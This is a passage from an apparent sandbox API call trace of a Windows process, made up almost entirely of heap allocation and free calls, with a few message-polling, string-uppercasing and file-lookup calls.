returned 1 [0103.228] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x29f6f00 | out: hHeap=0x2af0000) returned 1 [0103.228] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a71e88 | out: hHeap=0x2af0000) returned 1 [0103.228] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a71db8 | out: hHeap=0x2af0000) returned 1 [0103.228] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x1) returned 0x2a71e88 [0103.228] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aa9208 [0103.228] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a71db8 [0103.228] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aa9160 [0103.228] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a71db8 | out: hHeap=0x2af0000) returned 1 [0103.228] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x1) returned 0x2a71db8 [0103.228] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aa9178 [0103.228] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a71eb8 [0103.228] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a71eb8 | out: hHeap=0x2af0000) returned 1 [0103.228] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0xc) returned 0x2aa9250 [0103.228] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x20) returned 0x2a77d28 [0103.228] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aa9310 [0103.228] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x4) returned 0x2a71eb8 [0103.228] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aa9310 | out: hHeap=0x2af0000) returned 1 [0103.228] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x20) returned 0x2a77d00 [0103.228] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aa9268 [0103.228] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aa92c8 [0103.228] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x20) returned 0x2a77bc0 [0103.228] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aa9310 [0103.228] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x4) returned 0x2a71fe8 [0103.228] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aa9310 | out: hHeap=0x2af0000) returned 1 [0103.228] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x20) returned 0x2a77ee0 [0103.228] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aa9310 [0103.228] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aa9328 [0103.228] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x20) returned 0x2a77e18 [0103.229] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aa9040 [0103.229] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x4) returned 0x2a72098 [0103.229] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aa9040 | out: hHeap=0x2af0000) returned 1 [0103.229] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x20) returned 0x2a77d78 [0103.229] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aa9040 [0103.229] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aa9058 [0103.229] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x20) returned 0x2a77c38 [0103.229] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aa9610 [0103.229] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x4) returned 0x2a72028 [0103.229] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aa9610 | out: hHeap=0x2af0000) returned 1 [0103.229] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x20) returned 0x2a77f08 [0103.229] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aa9430 [0103.229] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x40) returned 0x2a5de40 [0103.229] PeekMessageW (in: lpMsg=0x8cf708, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf708) returned 0 [0103.229] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a72088 [0103.229] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a720d8 [0103.229] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aa9448 [0103.229] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aa9598 [0103.229] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a720e8 [0103.229] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aa9460 [0103.229] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a720e8 | out: hHeap=0x2af0000) returned 1 [0103.229] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x4) returned 0x2a720e8 [0103.229] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x20) returned 0x2a77f30 [0103.229] CharUpperBuffW (in: lpsz="SSA2100602512", cchLength=0xd | out: lpsz="SSA2100602512") returned 0xd [0103.229] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a77f30 | out: hHeap=0x2af0000) returned 1 [0103.229] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a720e8 | out: hHeap=0x2af0000) returned 1 [0103.229] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aa9460 | out: hHeap=0x2af0000) returned 1 [0103.229] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aa9598 | out: hHeap=0x2af0000) returned 1 [0103.229] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aa9448 | out: hHeap=0x2af0000) returned 1 [0103.229] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a720d8 | out: hHeap=0x2af0000) returned 1 [0103.229] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a72088 | out: hHeap=0x2af0000) returned 1 [0103.229] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x38) returned 0x2a5ecc0 [0103.229] PeekMessageW (in: lpMsg=0x8cf708, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf708) returned 0 [0103.230] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a5ecc0 | out: hHeap=0x2af0000) returned 1 [0103.230] PeekMessageW (in: lpMsg=0x8cf708, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf708) returned 0 [0103.230] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aa9448 [0103.230] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x4) returned 0x2a720d8 [0103.230] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aa9448 | out: hHeap=0x2af0000) returned 1 [0103.230] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x20) returned 0x2a77df0 [0103.230] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aa9448 [0103.230] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aa9460 [0103.230] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x4) returned 0x2a72088 [0103.230] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x20) returned 0x2a77c10 [0103.230] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aa9478 [0103.230] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x4) returned 0x2a720e8 [0103.230] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aa9478 | out: hHeap=0x2af0000) returned 1 [0103.230] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x20) returned 0x2a77a80 [0103.230] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aa9598 [0103.230] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aa9478 [0103.230] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aa9448 | out: hHeap=0x2af0000) returned 1 [0103.230] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aa9520 [0103.230] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aa9448 [0103.230] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x4) returned 0x2a726a8 [0103.230] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x20) returned 0x2a77e40 [0103.230] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aa94d8 [0103.230] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x4) returned 0x2a72628 [0103.230] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aa94d8 | out: hHeap=0x2af0000) returned 1 [0103.230] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x20) returned 0x2a77aa8 [0103.230] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aa9610 [0103.230] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aa94d8 [0103.230] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a77df0 | out: hHeap=0x2af0000) returned 1 [0103.230] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a720d8 | out: hHeap=0x2af0000) returned 1 [0103.230] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aa9520 | out: hHeap=0x2af0000) returned 1 [0103.230] PeekMessageW (in: lpMsg=0x8cf708, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf708) returned 0 [0103.230] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aa9520 [0103.231] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x4) returned 0x2a720d8 [0103.231] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aa9520 | out: hHeap=0x2af0000) returned 1 [0103.231] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x20) returned 0x2a77b48 [0103.231] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aa9520 [0103.231] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aa9538 [0103.231] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x4) returned 0x2a72748 [0103.231] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x20) returned 0x2a77eb8 [0103.231] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aa95b0 [0103.231] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x4) returned 0x2a72778 [0103.231] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aa95b0 | out: hHeap=0x2af0000) returned 1 [0103.231] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x20) returned 0x2a77f30 [0103.231] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aa9568 [0103.231] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aa95b0 [0103.231] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a72708 [0103.231] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aa9520 | out: hHeap=0x2af0000) returned 1 [0103.231] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aa95e0 [0103.231] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aa9520 [0103.231] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a72648 [0103.231] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aa9670 [0103.231] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a72648 | out: hHeap=0x2af0000) returned 1 [0103.231] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aa9670 | out: hHeap=0x2af0000) returned 1 [0103.231] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aa9520 | out: hHeap=0x2af0000) returned 1 [0103.231] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aa95e0 | out: hHeap=0x2af0000) returned 1 [0103.231] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a72708 | out: hHeap=0x2af0000) returned 1 [0103.231] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aa9538 | out: hHeap=0x2af0000) returned 1 [0103.231] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a72748 | out: hHeap=0x2af0000) returned 1 [0103.231] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aa95b0 | out: hHeap=0x2af0000) returned 1 [0103.231] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aa95e0 [0103.231] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aa9520 [0103.231] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x4) returned 0x2a72708 [0103.231] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x20) returned 0x2a77dc8 [0103.231] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aa9538 [0103.232] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x4) returned 0x2a72648 [0103.232] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aa9538 | out: hHeap=0x2af0000) returned 1 [0103.232] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x20) returned 0x2a77f58 [0103.232] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aa9538 [0103.232] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aa95b0 [0103.232] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a72718 [0103.232] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aa95e0 | out: hHeap=0x2af0000) returned 1 [0103.232] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a72718 | out: hHeap=0x2af0000) returned 1 [0103.232] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aa9520 | out: hHeap=0x2af0000) returned 1 [0103.232] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a72708 | out: hHeap=0x2af0000) returned 1 [0103.232] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aa95b0 | out: hHeap=0x2af0000) returned 1 [0103.232] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a77b48 | out: hHeap=0x2af0000) returned 1 [0103.232] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a720d8 | out: hHeap=0x2af0000) returned 1 [0103.232] PeekMessageW (in: lpMsg=0x8cf708, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf708) returned 0 [0103.232] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aa9520 [0103.232] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x4) returned 0x2a720d8 [0103.232] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aa9520 | out: hHeap=0x2af0000) returned 1 [0103.232] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x20) returned 0x2a77af8 [0103.232] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aa9520 [0103.232] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aa95b0 [0103.232] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x4) returned 0x2a72708 [0103.232] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x20) returned 0x2a77df0 [0103.232] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aa95e0 [0103.232] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x4) returned 0x2a72718 [0103.232] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aa95e0 | out: hHeap=0x2af0000) returned 1 [0103.232] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x20) returned 0x2a77c60 [0103.232] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aa95e0 [0103.232] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aa9688 [0103.232] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a77af8 | out: hHeap=0x2af0000) returned 1 [0103.232] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a720d8 | out: hHeap=0x2af0000) returned 1 [0103.232] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aa9520 | out: hHeap=0x2af0000) returned 1 [0103.232] PeekMessageW (in: lpMsg=0x8cf708, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf708) returned 0 [0103.233] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aa9520 [0103.233] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x4) returned 0x2a720d8 [0103.233] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aa9520 | out: hHeap=0x2af0000) returned 1 [0103.233] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x20) returned 0x2a77ad0 [0103.233] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aa9520 [0103.233] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aa9820 [0103.233] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x4) returned 0x2a72738 [0103.233] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x20) returned 0x2a77e68 [0103.233] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aa9778 [0103.233] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x4) returned 0x2a72748 [0103.233] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aa9778 | out: hHeap=0x2af0000) returned 1 [0103.233] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x20) returned 0x2a77e90 [0103.233] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aa9670 [0103.233] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aa9778 [0103.233] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a728f8 [0103.233] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aa9520 | out: hHeap=0x2af0000) returned 1 [0103.233] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aa9520 [0103.233] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aa9808 [0103.233] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a72aa8 [0103.233] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aa9790 [0103.233] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a72aa8 | out: hHeap=0x2af0000) returned 1 [0103.233] FindFirstFileW (in: lpFileName="C:\\Users\\FD1HVy\\Desktop/MH23a5.bmp", lpFindFileData=0x8cf170 | out: lpFindFileData=0x8cf170*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x3022d80, ftCreationTime.dwHighDateTime=0x1d5cb0f, ftLastAccessTime.dwLowDateTime=0x7517fd0, ftLastAccessTime.dwHighDateTime=0x1d5d596, ftLastWriteTime.dwLowDateTime=0x7517fd0, ftLastWriteTime.dwHighDateTime=0x1d5d596, nFileSizeHigh=0x0, nFileSizeLow=0x80c1, dwReserved0=0x0, dwReserved1=0x0, cFileName="MH23a5.bmp", cAlternateFileName="")) returned 0x9a3b80 [0103.233] FindClose (in: hFindFile=0x9a3b80 | out: hFindFile=0x9a3b80) returned 1 [0103.234] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aa9790 | out: hHeap=0x2af0000) returned 1 [0103.234] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aa9808 | out: hHeap=0x2af0000) returned 1 [0103.234] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aa9520 | out: hHeap=0x2af0000) returned 1 [0103.234] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a728f8 | out: hHeap=0x2af0000) returned 1 [0103.234] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aa9820 | out: hHeap=0x2af0000) returned 1 [0103.234] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a72738 | out: hHeap=0x2af0000) returned 1 [0103.234] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aa9778 | out: hHeap=0x2af0000) returned 1 [0103.234] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a77ad0 | out: hHeap=0x2af0000) returned 1 [0103.234] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a720d8 | out: hHeap=0x2af0000) returned 1 [0103.234] PeekMessageW (in: lpMsg=0x8cf708, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf708) returned 0 [0103.234] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aa96a0 [0103.234] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x4) returned 0x2a720d8 [0103.234] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aa96a0 | out: hHeap=0x2af0000) returned 1 [0103.234] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x20) returned 0x2a77ad0 [0103.234] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aa9778 [0103.234] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aa96b8 [0103.234] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x4) returned 0x2a72738 [0103.234] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x20) returned 0x2a77b98 [0103.234] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aa96a0 [0103.234] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x4) returned 0x2a728f8 [0103.234] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aa96a0 | out: hHeap=0x2af0000) returned 1 [0103.234] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x20) returned 0x2a77af8 [0103.234] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aa96a0 [0103.234] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aa96e8 [0103.234] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a72a38 [0103.234] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aa9778 | out: hHeap=0x2af0000) returned 1 [0103.234] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aa9850 [0103.234] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aa9700 [0103.234] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a72a08 [0103.234] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aa9778 [0103.234] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a72a08 | out: hHeap=0x2af0000) returned 1 [0103.234] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aa9778 | out: hHeap=0x2af0000) returned 1 [0103.235] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aa9700 | out: hHeap=0x2af0000) returned 1 [0103.235] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aa9850 | out: hHeap=0x2af0000) returned 1 [0103.235] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a72a38 | out: hHeap=0x2af0000) returned 1 [0103.235] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aa96b8 | out: hHeap=0x2af0000) returned 1 [0103.235] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a72738 | out: hHeap=0x2af0000) returned 1 [0103.235] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aa96e8 | out: hHeap=0x2af0000) returned 1 [0103.235] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a77ad0 | out: hHeap=0x2af0000) returned 1 [0103.235] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a720d8 | out: hHeap=0x2af0000) returned 1 [0103.235] PeekMessageW (in: lpMsg=0x8cf708, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf708) returned 0 [0103.235] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x20) returned 0x2a77be8 [0103.235] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x4) returned 0x2a720d8 [0103.235] CharUpperBuffW (in: lpsz="A1100103809", cchLength=0xb | out: lpsz="A1100103809") returned 0xb [0103.235] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a77be8 | out: hHeap=0x2af0000) returned 1 [0103.235] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a720d8 | out: hHeap=0x2af0000) returned 1 [0103.235] PeekMessageW (in: lpMsg=0x8cf4a8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf4a8) returned 0 [0103.235] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a72a08 | out: hHeap=0x2af0000) returned 1 [0103.235] CharUpperBuffW (in: lpsz="SSA1100103809", cchLength=0xd | out: lpsz="SSA1100103809") returned 0xd [0103.235] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a77ad0 | out: hHeap=0x2af0000) returned 1 [0103.235] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a72aa8 | out: hHeap=0x2af0000) returned 1 [0103.235] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aa9718 | out: hHeap=0x2af0000) returned 1 [0103.235] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aa9820 | out: hHeap=0x2af0000) returned 1 [0103.235] HeapFree (in: 